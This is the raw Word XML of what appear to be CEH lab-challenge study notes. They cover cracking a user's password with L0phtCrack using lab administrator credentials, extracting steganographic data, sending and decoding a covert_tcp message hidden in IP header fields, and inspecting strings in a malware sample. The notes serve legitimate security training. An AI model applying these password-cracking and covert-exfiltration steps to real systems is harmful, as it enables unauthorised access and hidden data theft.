        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-&gt;inf any pass given then: SNOW.EXE -C Confidential.txt -p pass.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="22B7B99F" w:rsidP="22B7B99F" w:rsidRDefault="22B7B99F" w14:paraId="027C8E09" w14:textId="4BF10EC8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22B7B99F" w:rsidP="22B7B99F" w:rsidRDefault="22B7B99F" w14:paraId="5BA003DE" w14:textId="09C1964C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160437AC" w:rsidP="22B7B99F" w:rsidRDefault="160437AC" w14:paraId="7CEBC255" w14:textId="4A8BA449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4. </w:t>
      </w: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>You have been given a task to audit the passwords of a server present in CEHORG network.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w: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Find out the password of the user Adam and submit it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="160437AC" w:rsidP="22B7B99F" w:rsidRDefault="160437AC" w14:paraId="308BAD20" w14:textId="69C86CC2">
      <w:pPr>
        <w:pStyle w:val="Normal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>Note: Use Administrator/</w:t>
      </w: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>C$CPa</w:t>
      </w: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>$$ when asked for credentials.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w: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Format: </w:t>
      </w:r>
      <w:r w:rsidRPr="22B7B99F" w:rsidR="160437AC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>aaaaaaaN</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4CBD5A1F" w:rsidRDefault="4CBD5A1F" w14:paraId="1A972FE5" w14:textId="1AA8926A">
      <w:r w:rsidR="4CBD5A1F">
        <w:rPr/>
        <w:t>Ans: From windows-&gt;E drive-&gt;</w:t>
      </w:r>
      <w:r w:rsidR="4CBD5A1F">
        <w:rPr/>
        <w:t>CEHTools</w:t>
      </w:r>
      <w:r w:rsidR="4CBD5A1F">
        <w:rPr/>
        <w:t>-&gt;M6 System Hacking-&gt;Pass</w:t>
      </w:r>
      <w:r w:rsidR="08BE8E6C">
        <w:rPr/>
        <w:t>word crack-&gt;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 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installl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 L0phtCrack (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it’s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 a password auditing tool)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="08BE8E6C" w:rsidRDefault="08BE8E6C" w14:paraId="60A10579" w14:textId="7000DCD7"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-&gt; gather the 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ip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 address of the system (10.10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.....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)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="08BE8E6C" w:rsidP="22B7B99F" w:rsidRDefault="08BE8E6C" w14:paraId="77FB0992" w14:textId="4FC528C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-&gt;open L0phtCrack </w:t>
      </w:r>
      <w:r w:rsidRPr="22B7B99F" w:rsidR="08BE8E6C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="22B7B99F" w:rsidR="08BE8E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 </w:t>
      </w:r>
      <w:r w:rsidRPr="22B7B99F" w:rsidR="08BE8E6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Password Auditing wizard option-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="22B7B99F" w:rsidR="7522E7A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Intro(next)-&gt;select ,machine type(windows)-&gt;windows import(remote machine option)-&gt;host </w:t>
      </w:r>
      <w:r w:rsidRPr="22B7B99F" w:rsidR="7522E7AB">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:r w:rsidRPr="22B7B99F" w:rsidR="7522E7A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(identify from </w:t>
      </w:r>
      <w:r w:rsidRPr="22B7B99F" w:rsidR="6A836F63">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>gievn</w:t>
      </w:r>
      <w:r w:rsidRPr="22B7B99F" w:rsidR="6A836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6A836F63">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ips</w:t>
      </w:r>
      <w:r w:rsidRPr="22B7B99F" w:rsidR="6A836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...10.10...in my case+ use specific cred: </w:t>
      </w:r>
      <w:r w:rsidRPr="22B7B99F" w:rsidR="1646CC80">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Administrator/</w:t>
      </w:r>
      <w:r w:rsidRPr="22B7B99F" w:rsidR="1646CC80">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C$CPa</w:t>
      </w:r>
      <w:r w:rsidRPr="22B7B99F" w:rsidR="1646CC8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$$ as </w:t>
      </w:r>
      <w:r w:rsidRPr="22B7B99F" w:rsidR="1646CC80">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>uname</w:t>
      </w:r>
      <w:r w:rsidRPr="22B7B99F" w:rsidR="1646CC8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&amp; pass</w:t>
      </w:r>
      <w:r w:rsidRPr="22B7B99F" w:rsidR="214B6A91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+ domain: CEHORG.com</w:t>
      </w:r>
      <w:r w:rsidRPr="22B7B99F" w:rsidR="6A836F63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 w:rsidRPr="22B7B99F" w:rsidR="60B9D5A8">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-&gt; quick password audit option-&gt;next-&gt;next-&gt;next-&gt;finish</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="038E1041" w:rsidP="22B7B99F" w:rsidRDefault="038E1041" w14:paraId="43D7D035" w14:textId="05D92EF3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B7B99F" w:rsidR="038E104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-&gt; now Look for “Adam” </w:t>
      </w:r>
      <w:r w:rsidRPr="22B7B99F" w:rsidR="038E1041">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>inthe</w:t>
      </w:r>
      <w:r w:rsidRPr="22B7B99F" w:rsidR="038E104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list and </w:t>
      </w:r>
      <w:r w:rsidRPr="22B7B99F" w:rsidR="038E1041">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>submit</w:t>
      </w:r>
      <w:r w:rsidRPr="22B7B99F" w:rsidR="038E104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its password as flag.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="60B9D5A8" w:rsidRDefault="60B9D5A8" w14:paraId="06EF0451" w14:textId="1316BFDD">
      <w:r w:rsidR="60B9D5A8">
        <w:drawing>
          <wp:inline wp14:editId="7C158E1A" wp14:anchorId="3D6A5328">
            <wp:extent cx="5943600" cy="4248150"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="174697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665400ce4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C03CFE" w:rsidP="22B7B99F" w:rsidRDefault="54C03CFE" w14:paraId="397C7F42" w14:textId="764A9D8F">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
      </w:pPr>
      <w:r w:rsidR="54C03CFE">
        <w:rPr/>
        <w:t>5.</w:t>
      </w:r>
      <w:r w:rsidRPr="22B7B99F" w:rsidR="54C03C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The incident response team has intercepted an image file from a communication that is supposed to have just text.</w:t>
      </w:r>
      <w:r>
        <w:br/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are asked to investigate the file and check if it contains any hidden information.</w:t>
      </w:r>
      <w:r>
        <w:br/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Find out the information hidden in the file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="54C03CFE" w:rsidP="22B7B99F" w:rsidRDefault="54C03CFE" w14:paraId="03957F0D" w14:textId="4AF1F335">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
      </w:pPr>
      <w:r w:rsidRPr="22B7B99F" w:rsidR="54C03C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Note:</w:t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</w:t>
      </w:r>
      <w:r w:rsidRPr="22B7B99F" w:rsidR="54C03CFE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>vacation.bmp</w:t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is located at:</w:t>
      </w:r>
      <w:r>
        <w:br/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54C03CFE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C:\Users\Admin\Documents</w:t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</w:t>
      </w:r>
      <w:r w:rsidRPr="22B7B99F" w:rsidR="54C03C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EH Workstation – 2</w:t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machine.</w:t>
      </w:r>
      <w:r>
        <w:br/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54C03C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54C03C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54C03CFE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>AAAANNNNNNNN</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="54C03CFE" w:rsidP="22B7B99F" w:rsidRDefault="54C03CFE" w14:paraId="382E571A" w14:textId="53980EC6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</w:pPr>
      <w:r w:rsidR="54C03CFE">
        <w:rPr/>
        <w:t>From windows-&gt;E drive-&gt;</w:t>
      </w:r>
      <w:r w:rsidR="54C03CFE">
        <w:rPr/>
        <w:t>CEHTools</w:t>
      </w:r>
      <w:r w:rsidR="54C03CFE">
        <w:rPr/>
        <w:t>-&gt;M6 System Hacking-&gt;Steg-&gt;image-&gt;OpenStego</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7DF47791" w:rsidP="22B7B99F" w:rsidRDefault="7DF47791" w14:paraId="2E1EEC97" w14:textId="07F1BE7F">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/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</w:pPr>
      <w:r w:rsidRPr="22B7B99F" w:rsidR="7DF477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highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">6. 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A disgruntled employee in CEHORG has used the </w:t>
      </w:r>
      <w:r w:rsidRPr="22B7B99F" w:rsidR="7DF47791">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Covert_TCP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utility to share a secret message with another user in the CEHORG network.</w:t>
      </w:r>
      <w:r>
        <w:br/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</w:t>
      </w:r>
      <w:r w:rsidRPr="22B7B99F" w:rsidR="7DF47791">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Covert_TCP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manipulates the </w:t>
      </w:r>
      <w:r w:rsidRPr="22B7B99F" w:rsidR="7DF47791">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TCP/IP header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of the data packets to send a file one byte at a time from any host to a destination.</w:t>
      </w:r>
      <w:r>
        <w:br/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It can be used to hide the data inside IP header fields.</w:t>
      </w:r>
      <w:r>
        <w:br/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The employee used the IP ID field to hide the message.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7DF47791" w:rsidP="22B7B99F" w:rsidRDefault="7DF47791" w14:paraId="08D102FA" w14:textId="0802D81D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1"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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The network capture file </w:t>
      </w:r>
      <w:r w:rsidRPr="22B7B99F" w:rsidR="7DF47791">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Capture.pcapng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has been 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>retained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in:</w:t>
      </w:r>
      <w:r>
        <w:br/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</w:t>
      </w:r>
      <w:r w:rsidRPr="22B7B99F" w:rsidR="7DF47791">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C:\Users\Administrator\Documents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of the </w:t>
      </w:r>
      <w:r w:rsidRPr="22B7B99F" w:rsidR="7DF47791">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>EH Workstation – 2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machine.</w:t>
      </w:r>
      <w:r>
        <w:br/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Analyze the session to get the message that was transmitted.</w:t>
      </w:r>
      <w:r>
        <w:br/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</w:t>
      </w:r>
      <w:r w:rsidRPr="22B7B99F" w:rsidR="7DF47791">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Format:</w:t>
      </w:r>
      <w:r w:rsidRPr="22B7B99F" w:rsidR="7DF47791">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="22B7B99F" w:rsidR="7DF47791">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>AN*AN*AN</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="323F3D64" w:rsidP="22B7B99F" w:rsidRDefault="323F3D64" w14:paraId="5CC6D9D2" w14:textId="6620C2F5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22B7B99F" w:rsidR="323F3D64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Link: </w:t>
      </w:r>
      <w:hyperlink r:id="R1eb82a196bd04fb9">
        <w:r w:rsidRPr="22B7B99F" w:rsidR="323F3D64">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://www.youtube.com/watch?v=aNHW1A_rpNs&amp;list=PLZEA2EJpqSWfouVNPkl37AWEVCj6A2mdz&amp;index=5&amp;ab_channel=ThePentesterGuy</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="42345169" w:rsidP="22B7B99F" w:rsidRDefault="42345169" w14:paraId="3EF394B2" w14:textId="3DD2CEAC">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
      </w:pPr>
      <w:r w:rsidR="42345169">
        <w:drawing>
          <wp:inline wp14:editId="19053A4B" wp14:anchorId="2A80A3E9">
            <wp:extent cx="5943600" cy="762000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="110422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83bff633b41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345169" w:rsidP="22B7B99F" w:rsidRDefault="42345169" w14:paraId="32906151" w14:textId="7B4C8FC6">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
      </w:pPr>
      <w:r w:rsidR="42345169">
        <w:rPr/>
        <w:t xml:space="preserve">Flags </w:t>
      </w:r>
      <w:r w:rsidR="42345169">
        <w:rPr/>
        <w:t>can’t</w:t>
      </w:r>
      <w:r w:rsidR="42345169">
        <w:rPr/>
        <w:t xml:space="preserve"> be obtained with </w:t>
      </w:r>
      <w:r w:rsidR="42345169">
        <w:rPr/>
        <w:t>tcp</w:t>
      </w:r>
      <w:r w:rsidR="42345169">
        <w:rPr/>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="57537D88">
        <w:rPr/>
        <w:t xml:space="preserve">So download </w:t>
      </w:r>
      <w:r w:rsidR="57537D88">
        <w:rPr/>
        <w:t>covert_TCP.c</w:t>
      </w:r>
      <w:r w:rsidR="57537D88">
        <w:rPr/>
        <w:t xml:space="preserve"> code file from online.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="57537D88" w:rsidP="22B7B99F" w:rsidRDefault="57537D88" w14:paraId="7E15F09B" w14:textId="46BC0BF0">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
      </w:pPr>
      <w:r w:rsidR="57537D88">
        <w:rPr/>
        <w:t>Identify</w:t>
      </w:r>
      <w:r w:rsidR="57537D88">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="57537D88">
        <w:rPr/>
        <w:t>src</w:t>
      </w:r>
      <w:r w:rsidR="57537D88">
        <w:rPr/>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="57537D88">
        <w:rPr/>
        <w:t>dst</w:t>
      </w:r>
      <w:r w:rsidR="57537D88">
        <w:rPr/>
        <w:t xml:space="preserve"> port from the </w:t>
      </w:r>
      <w:r w:rsidR="57537D88">
        <w:rPr/>
        <w:t>pcap</w:t>
      </w:r>
      <w:r w:rsidR="57537D88">
        <w:rPr/>
        <w:t xml:space="preserve"> file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="57537D88" w:rsidP="22B7B99F" w:rsidRDefault="57537D88" w14:paraId="35801AA7" w14:textId="562B8F35">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
      </w:pPr>
      <w:r w:rsidR="57537D88">
        <w:rPr/>
        <w:t xml:space="preserve">-&gt; </w:t>
      </w:r>
      <w:r w:rsidR="72CB77AB">
        <w:rPr/>
        <w:t xml:space="preserve">To make/send for practice: </w:t>
      </w:r>
      <w:r w:rsidR="57537D88">
        <w:rPr/>
        <w:t>command: ./covert_tcp –source 10.0.2.15 -dest 10.0.2.4  -source_port 9999 –dest_port 8888</w:t>
      </w:r>
      <w:r w:rsidR="77B52BD8">
        <w:rPr/>
        <w:t xml:space="preserve"> –file secret.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="35BB6D75" w:rsidP="22B7B99F" w:rsidRDefault="35BB6D75" w14:paraId="5AD6F1F8" w14:textId="19BFAB96">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
      </w:pPr>
      <w:r w:rsidR="35BB6D75">
        <w:rPr/>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="35BB6D75">
        <w:rPr/>
        <w:t>&gt; .</w:t>
      </w:r>
      <w:r w:rsidR="35BB6D75">
        <w:rPr/>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="35BB6D75">
        <w:rPr/>
        <w:t>covert_tcp</w:t>
      </w:r>
      <w:r w:rsidR="35BB6D75">
        <w:rPr/>
        <w:t xml:space="preserve"> –source 10.0.2.15 -</w:t>
      </w:r>
      <w:r w:rsidR="35BB6D75">
        <w:rPr/>
        <w:t>source_port</w:t>
      </w:r>
      <w:r w:rsidR="35BB6D75">
        <w:rPr/>
        <w:t xml:space="preserve"> 8888 –server –file receive.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="52F8F8D4" w:rsidP="22B7B99F" w:rsidRDefault="52F8F8D4" w14:paraId="668BD386" w14:textId="5DB79C4A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22B7B99F" w:rsidR="52F8F8D4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>++</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="52F8F8D4" w:rsidP="22B7B99F" w:rsidRDefault="52F8F8D4" w14:paraId="1427B71D" w14:textId="332D84CA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22B7B99F" w:rsidR="52F8F8D4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Walkthrough on how to solve if .</w:t>
      </w:r>
      <w:r w:rsidRPr="22B7B99F" w:rsidR="52F8F8D4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pcap</w:t>
      </w:r>
      <w:r w:rsidRPr="22B7B99F" w:rsidR="52F8F8D4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 xml:space="preserve"> file is given:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="22B7B99F" w:rsidR="620074DA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>****https://github.com/Samsar4/Ethical-Hacking-Labs/blob/master/5-System-Hacking/10-Covert_TCP.md</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="641CCE50" w:rsidP="22B7B99F" w:rsidRDefault="641CCE50" w14:paraId="194B37A3" w14:textId="17177679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>7.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You are a </w:t>
      </w:r>
      <w:r w:rsidRPr="22B7B99F" w:rsidR="641CCE50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malware analyst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working for CEHORG. During your assessment within your organisation’s network, you found a malware </w:t>
      </w:r>
      <w:r w:rsidRPr="22B7B99F" w:rsidR="641CCE50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face.exe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>.</w:t>
      </w:r>
      <w:r>
        <w:br/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The malware is extracted and placed at:</w:t>
      </w:r>
      <w:r>
        <w:br/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C:\Users\Admin\Documents in the </w:t>
      </w:r>
      <w:r w:rsidRPr="22B7B99F" w:rsidR="641CCE50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EH Workstation – 2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machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="641CCE50" w:rsidP="22B7B99F" w:rsidRDefault="641CCE50" w14:paraId="589CA864" w14:textId="5590A1C4">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
      </w:pPr>
      <w:r w:rsidRPr="22B7B99F" w:rsidR="641CCE50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Task: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Analyze the malware and find out the </w:t>
      </w:r>
      <w:r w:rsidRPr="22B7B99F" w:rsidR="641CCE50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File position for KERNEL32.dll text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>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="641CCE50" w:rsidP="22B7B99F" w:rsidRDefault="641CCE50" w14:paraId="2B6C7F85" w14:textId="69CE40E4">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
      </w:pPr>
      <w:r w:rsidRPr="22B7B99F" w:rsidR="641CCE50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Hint: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Exclude zeros.</w:t>
      </w:r>
      <w:r>
        <w:br/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</w:t>
      </w:r>
      <w:r w:rsidRPr="22B7B99F" w:rsidR="641CCE50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Format:</w:t>
      </w:r>
      <w:r w:rsidRPr="22B7B99F" w:rsidR="641CCE50">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> AANN</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="641CCE50" w:rsidP="22B7B99F" w:rsidRDefault="641CCE50" w14:paraId="1CA78704" w14:textId="65C012F6">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
      </w:pPr>
      <w:r w:rsidR="641CCE50">
        <w:drawing>
          <wp:inline wp14:editId="6C68E499" wp14:anchorId="0937F780">
            <wp:extent cx="5943600" cy="2476500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="482309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1c7439773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CCE50" w:rsidP="22B7B99F" w:rsidRDefault="641CCE50" w14:paraId="2015C3E4" w14:textId="12EF84CD">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="641CCE50">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>-&gt; E drive-&gt;</w:t>
      </w:r>
      <w:r w:rsidR="641CCE50">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>CEHTools</w:t>
      </w:r>
      <w:r w:rsidR="641CCE50">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="5DD3D8B5">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>&gt;CEHv13 Module 07 Malware Threats\Malware Analysis Tools\Static Malware Analysis Tools\String Searching Tools\</w:t>
      </w:r>
      <w:r w:rsidR="5DD3D8B5">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>BinText</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5DD3D8B5" w:rsidP="22B7B99F" w:rsidRDefault="5DD3D8B5" w14:paraId="67F64D49" w14:textId="0D460E6E">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off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="5DD3D8B5">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-&gt;browse the </w:t>
      </w:r>
      <w:r w:rsidRPr="22B7B99F" w:rsidR="5DD3D8B5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 xml:space="preserve">KERNEL32.dll&gt; there maybe more than one pos.-&gt;search which one matches the given </w:t>
      </w:r>
      <w:r w:rsidRPr="22B7B99F" w:rsidR="5DD3D8B5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format(</w:t>
      </w:r>
